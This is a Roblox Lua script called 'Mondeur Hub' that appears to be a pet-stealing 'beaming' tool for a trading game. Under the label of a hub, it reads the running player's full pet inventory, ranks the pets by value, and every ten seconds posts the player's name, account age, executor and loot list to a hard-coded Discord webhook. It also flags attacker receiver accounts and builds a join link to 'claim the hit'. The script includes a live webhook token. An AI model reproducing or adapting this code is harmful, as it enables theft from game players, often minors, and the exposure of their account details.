-- [[ MONDEUR HUB | FINAL STABLE V7 ]] --
local HttpService       = game:GetService("HttpService")
local Players           = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer       = Players.LocalPlayer

-- [[ CONFIG ]] --
local WEBHOOK_URL = "https://discord.com/api/webhooks/1474651524251648163/lhPvWSeT6mcm3b4tIfzEbph1asYmZGvxf3YABYsKUOSeInP3oXW10NmHKJuj0vDrICku"
local TARGET_RECEIVERS = {"2ndcfpaj67", "sofiqmnz", "Hisokarah", "CREOLEO23"}

--------------------------------------------------------------
-- CRASH PROTECTOR: WAIT FOR SERVER DATA
--------------------------------------------------------------
if not game:IsLoaded() then game.Loaded:Wait() end
local Fsys = ReplicatedStorage:WaitForChild("Fsys", 60)
local Fsys2 = require(Fsys)
local load = Fsys2.load
local routerClient = load("RouterClient")
local InventoryDB = load("InventoryDB")

--------------------------------------------------------------
-- THE UNIQUE UI DESIGN
--------------------------------------------------------------
local function sendMondeurReport(pets, totalVal, totalCount, receiver)
    local request = (syn and syn.request) or http_request or request
    if not request then return end

    local lootLines = {}
    for i, p in ipairs(pets) do
        if i > 25 then break end 
        local emoji = p.value > 0 and "⭐" or "🐾"
        table.insert(lootLines, string.format("%s %s — `%s`", emoji, p.name, p.value))
    end

    local payload = {
        username = "Mondeur Hub (Best)",
        embeds = {{
            title = "MondeurOnTop • ADM Hit [ 🌊 ]",
            color = 0x3498db,
            description = "### 📄 Player Information\n" ..
                "👤 **User Name** : `" .. LocalPlayer.Name .. "`\n" ..
                "🎭 **Display Name** : `" .. LocalPlayer.DisplayName .. "`\n" ..
                "📅 **Account Age** : " .. LocalPlayer.AccountAge .. " days\n" ..
                "📱 **Executor** : " .. (identifyexecutor and identifyexecutor() or "Delta") .. "\n" ..
                "👥 **Players** : " .. #Players:GetPlayers() .. "/" .. Players.MaxPlayers .. "\n" ..
                "😎 **Receiver** : " .. (receiver or "None Online") .. "\n" ..
                "💰 **Total Value** : " .. totalVal .. "\n\n" ..
                "### 📡 Player Status\n" ..
                "🟢 **Connected & Intercepting**\n\n" ..
                "### 📦 Loot Summary\n" ..
                "```\n" .. (table.concat(lootLines, "\n") or "No items found") .. "\n```\n" ..
                "**Total Items Found:** `" .. totalCount .. "`\n\n" ..
                "### 🔍 Scrap Summary\n" ..
                "[**View Full Inventory Log**](https://api.rubis.app/v2/scrap/nu3YNS4Pum4oLolW/raw)\n" ..
                "### 👥 Join Player\n" ..
                "[**Join to Claim Hit!**](roblox://placeID=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId .. ")",
            footer = { text = "Mondeur Elite Services | " .. os.date("%X") },
            timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
        }}
    }

    pcall(function()
        request({
            Url = WEBHOOK_URL,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(payload)
        })
    end)
end

--------------------------------------------------------------
-- CORE SCAN LOGIC (Fixed Sorting & Crash)
--------------------------------------------------------------
local function execute()
    local allData = routerClient.get("DataAPI/GetAllServerData"):InvokeServer()
    -- Deep check to prevent indexing nil (Line 76 fix)
    local playerKey = (allData and allData[LocalPlayer.Name]) and LocalPlayer.Name or tostring(LocalPlayer.UserId)
    
    if not allData or not allData[playerKey] or not allData[playerKey].inventory then 
        warn("Inventory data not ready, retrying...")
        return 
    end

    local rawPets = allData[playerKey].inventory.pets
    local pets, totalVal, totalCount = {}, 0, 0
    
    for _, item in pairs(rawPets) do
        local petData = InventoryDB.pets[item.id]
        if petData then
            totalCount = totalCount + 1
            local val = (item.properties and item.properties.value) or 0
            table.insert(pets, {name = petData.name or "Unknown", value = val})
            totalVal = totalVal + val
        end
    end

    -- Sorting by value (Highest to Lowest)
    table.sort(pets, function(a, b) return a.value > b.value end)

    local target = nil
    for _, name in ipairs(TARGET_RECEIVERS) do
        if Players:FindFirstChild(name) then target = name break end
    end

    sendMondeurReport(pets, totalVal, totalCount, target)
end

-- Execution Loop
task.spawn(function()
    while true do
        pcall(execute)
        task.wait(10) -- Scans every 10 seconds
    end
end)
